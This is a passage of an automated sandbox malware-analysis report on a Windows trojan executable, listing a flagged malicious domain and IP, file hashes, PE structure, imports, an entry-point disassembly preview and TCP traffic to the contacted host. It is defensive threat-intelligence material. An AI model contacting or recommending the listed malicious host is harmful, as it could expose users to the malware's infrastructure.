00000000.00000003.288987691.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.309024067.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.382209137.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                https://vervain.co.in/rosoncIpox4w8f.exe, 00000000.00000003.255360203.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.252950036.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                199.79.62.221
                		vervain.co.inUnited States
                		394695PUBLIC-DOMAIN-REGISTRYUStrue

                General Information

                Joe Sandbox Version:35.0.0 Citrine
                Analysis ID:679306
                Start date and time: 05/08/202215:07:122022-08-05 15:07:12 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 7m 55s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:ncIpox4w8f (renamed file extension from none to exe)
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:25
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal80.troj.winEXE@1/0@1/1
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                • TCP Packets have been reduced to 100
                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.223.24.244, 20.238.103.94
                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                • Execution Graph export aborted for target ncIpox4w8f.exe, PID 2916 because there are no executed function
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                15:08:19API Interceptor88x Sleep call for process: ncIpox4w8f.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.977226984193113
                TrID:
                • Win32 Executable (generic) a (10002005/4) 90.27%
                • Win32 Executable Borland Delphi 7 (665061/41) 6.00%
                • Win32 Executable Borland Delphi 6 (262906/60) 2.37%
                • Windows ActiveX control (116523/4) 1.05%
                • Win32 Executable Delphi generic (14689/80) 0.13%
                File name:ncIpox4w8f.exe
                File size:1009664
                MD5:03fb0f9df279b56130a63d5330461789
                SHA1:705d9c59fe6cdeec9e28d1d803cb94765d1dc4de
                SHA256:59290e0709f6bc918c12c38604eaabcd79b77f699ca2f1abf3af4fccef444a94
                SHA512:7370210b461ad1f345c90aae2753da60f5319006acac31f36a55a8512b70dbac8ecc2c2a226e4e94a9f835c5185d79d93c24812ae6d7a1e0cee40b374dc9587d
                SSDEEP:24576:5DA1mchKTwkH17WtMBhiUDxvHiMYStUtVSn52pAf2rDNtl2aCHX:5Dhc8ZPbVI5Sn52KN
                TLSH:93258D32F2D24833C4B32B3C5E1B52A599397E102E74D88A6BED1D981FF96417D392C6
                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                File Icon

                Icon Hash:c49af2e8ece0e6c8

                Static PE Info

                General

                Entrypoint:0x4a3b74
                Entrypoint Section:CODE
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                DLL Characteristics:
                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:205f6434858f3f8cc9e8b96d094507a2

                Entrypoint Preview

                Instruction
                push ebp
                mov ebp, esp
                add esp, FFFFFFF0h
                mov eax, 004A38D4h
                call 00007FB2DC6995D1h
                mov eax, dword ptr [004A587Ch]
                mov eax, dword ptr [eax]
                call 00007FB2DC6FA311h
                mov ecx, dword ptr [004A59E0h]
                mov eax, dword ptr [004A587Ch]
                mov eax, dword ptr [eax]
                mov edx, dword ptr [004A0C1Ch]
                call 00007FB2DC6FA311h
                mov eax, dword ptr [004A59E0h]
                mov eax, dword ptr [eax]
                call 00007FB2DC6F6D85h
                mov eax, dword ptr [004A587Ch]
                mov eax, dword ptr [eax]
                call 00007FB2DC6FA379h
                call 00007FB2DC697034h
                lea eax, dword ptr [eax+00h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0xa70000x27a4.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0xb90000x43000.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0xac0000xc1ec.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0xab0000x18.rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                CODE0x10000xa2bc80xa2c00False0.5100101406490015data6.535344306379752IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                DATA0xa40000x1aa40x1c00False0.42703683035714285data4.101220909917565IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                BSS0xa60000xef50x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata0xa70000x27a40x2800False0.3671875data5.001062777293974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .tls0xaa0000x400x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rdata0xab0000x180x200False0.05078125data0.2005819074398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .reloc0xac0000xc1ec0xc200False0.5179606958762887data6.616954325025841IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .rsrc0xb90000x430000x43000False0.5515610424440298data7.271052678577541IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountry
                AUDIOES0xb9d880x3697cRIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 44100 HzEnglishUnited States
                RT_CURSOR0xf07040x134data
                RT_CURSOR0xf08380x134data
                RT_CURSOR0xf096c0x134data
                RT_CURSOR0xf0aa00x134data
                RT_CURSOR0xf0bd40x134data
                RT_CURSOR0xf0d080x134data
                RT_CURSOR0xf0e3c0x134data
                RT_BITMAP0xf0f700x1d0data
                RT_BITMAP0xf11400x1e4data
                RT_BITMAP0xf13240x1d0data
                RT_BITMAP0xf14f40x1d0data
                RT_BITMAP0xf16c40x1d0data
                RT_BITMAP0xf18940x1d0data
                RT_BITMAP0xf1a640x1d0data
                RT_BITMAP0xf1c340x1d0data
                RT_BITMAP0xf1e040x1d0data
                RT_BITMAP0xf1fd40x1d0data
                RT_BITMAP0xf21a40xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                RT_ICON0xf228c0x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                RT_ICON0xf48340x988data
                RT_ICON0xf51bc0x468GLS_BINARY_LSB_FIRST
                RT_DIALOG0xf56240x52data
                RT_STRING0xf56780x114data
                RT_STRING0xf578c0x3d0data
                RT_STRING0xf5b5c0x554data
                RT_STRING0xf60b00x3ccdata
                RT_STRING0xf647c0x1d4data
                RT_STRING0xf66500x180data
                RT_STRING0xf67d00x314COM executable for DOS
                RT_STRING0xf6ae40x4f4data
                RT_STRING0xf6fd80x1c0data
                RT_STRING0xf71980xecdata
                RT_STRING0xf72840x134data
                RT_STRING0xf73b80x314data
                RT_STRING0xf76cc0x40cdata
                RT_STRING0xf7ad80x380data
                RT_STRING0xf7e580x3d4data
                RT_STRING0xf822c0x250data
                RT_STRING0xf847c0xecdata
                RT_STRING0xf85680x1dcdata
                RT_STRING0xf87440x3ecdata
                RT_STRING0xf8b300x3f4data
                RT_STRING0xf8f240x30cdata
                RT_STRING0xf92300x328data
                RT_RCDATA0xf95580x10data
                RT_RCDATA0xf95680x370data
                RT_RCDATA0xf98d80x16adDelphi compiled form 'TForm1'
                RT_RCDATA0xfaf880x2c3Delphi compiled form 'TForm2'
                RT_RCDATA0xfb24c0x39eDelphi compiled form 'TForm3'
                RT_RCDATA0xfb5ec0x2d0Delphi compiled form 'TForm4'
                RT_GROUP_CURSOR0xfb8bc0x14Lotus unknown worksheet or configuration, revision 0x1
                RT_GROUP_CURSOR0xfb8d00x14Lotus unknown worksheet or configuration, revision 0x1
                RT_GROUP_CURSOR0xfb8e40x14Lotus unknown worksheet or configuration, revision 0x1
                RT_GROUP_CURSOR0xfb8f80x14Lotus unknown worksheet or configuration, revision 0x1
                RT_GROUP_CURSOR0xfb90c0x14Lotus unknown worksheet or configuration, revision 0x1
                RT_GROUP_CURSOR0xfb9200x14Lotus unknown worksheet or configuration, revision 0x1
                RT_GROUP_CURSOR0xfb9340x14Lotus unknown worksheet or configuration, revision 0x1
                RT_GROUP_ICON0xfb9480x30data
                RT_VERSION0xfb9780x498dataGermanGermany

                Imports

                DLLImport
                kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FlushInstructionCache, FindResourceA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                gdi32.dllUnrealizeObject, StretchBlt, StartPage, StartDocA, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, BitBlt
                user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, ShowCaret, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawStateA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                kernel32.dllSleep
                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                ole32.dllCoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
                oleaut32.dllGetErrorInfo, GetActiveObject, SysFreeString
                comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                winspool.drvOpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter
                shell32.dllShellExecuteA
                comdlg32.dllGetSaveFileNameA, GetOpenFileNameA
                winmm.dllsndPlaySoundA
                kernel32VirtualProtect, GetProcAddress
                URLAddMIMEFileTypesPS

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                GermanGermany

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 5, 2022 15:08:21.484030962 CEST49744443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:21.484100103 CEST44349744199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:21.484188080 CEST49744443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:21.509588003 CEST49744443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:21.509640932 CEST44349744199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:21.862157106 CEST44349744199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:21.862267971 CEST49744443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:22.217925072 CEST49744443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:22.217978001 CEST44349744199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:22.218626976 CEST44349744199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:22.218995094 CEST49744443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:22.226758957 CEST49744443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:22.267422915 CEST44349744199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:22.399334908 CEST44349744199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:22.399461031 CEST49744443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:22.399487972 CEST44349744199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:22.399513006 CEST44349744199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:22.399539948 CEST49744443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:22.399564981 CEST49744443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:22.402040005 CEST49744443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:22.402065039 CEST44349744199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:22.402080059 CEST49744443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:22.402113914 CEST49744443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:22.861202002 CEST49752443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:22.861228943 CEST44349752199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:22.861300945 CEST49752443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:22.862855911 CEST49752443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:22.862869978 CEST44349752199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:23.211263895 CEST44349752199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:23.211412907 CEST49752443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:23.215138912 CEST49752443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:23.215150118 CEST44349752199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:23.221486092 CEST49752443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:23.221506119 CEST44349752199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:23.560089111 CEST44349752199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:23.560187101 CEST44349752199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:23.560342073 CEST49752443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:23.567523003 CEST49752443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:23.567540884 CEST44349752199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:23.567568064 CEST49752443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:23.567615032 CEST49752443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:24.068614006 CEST49755443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:24.068708897 CEST44349755199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:24.068830013 CEST49755443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:24.070420980 CEST49755443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:24.070461035 CEST44349755199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:24.411120892 CEST44349755199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:24.411216974 CEST49755443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:24.411870956 CEST49755443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:24.411885977 CEST44349755199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:24.417805910 CEST49755443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:24.417826891 CEST44349755199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:24.755089998 CEST44349755199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:24.755228043 CEST44349755199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:24.755284071 CEST49755443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:24.755309105 CEST49755443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:24.760893106 CEST49755443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:24.760936022 CEST44349755199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:24.760953903 CEST49755443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:24.760993958 CEST49755443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:25.134349108 CEST49758443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:25.134382010 CEST44349758199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:25.134471893 CEST49758443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:25.135454893 CEST49758443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:25.135468960 CEST44349758199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:25.477339029 CEST44349758199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:25.477513075 CEST49758443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:25.478104115 CEST49758443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:25.478117943 CEST44349758199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:25.499500990 CEST49758443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:25.499517918 CEST44349758199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:25.816201925 CEST44349758199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:25.816294909 CEST44349758199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:25.816315889 CEST49758443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:25.816359997 CEST49758443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:25.816796064 CEST49758443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:25.816817999 CEST44349758199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:25.816833019 CEST49758443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:25.816874981 CEST49758443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:26.243448973 CEST49759443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:26.243490934 CEST44349759199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:26.243602037 CEST49759443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:26.244436026 CEST49759443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:26.244461060 CEST44349759199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:26.586688042 CEST44349759199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:26.586846113 CEST49759443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:26.603463888 CEST49759443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:26.603482008 CEST44349759199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:26.608220100 CEST49759443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:26.608232021 CEST44349759199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:26.927123070 CEST44349759199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:26.927220106 CEST44349759199.79.62.221192.168.2.4
                Aug 5, 2022 15:08:26.927221060 CEST49759443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:26.927289009 CEST49759443192.168.2.4199.79.62.221
                Aug 5, 2022 15:08:26.931816101 CEST49759443192.168.2.4199.79.62.221
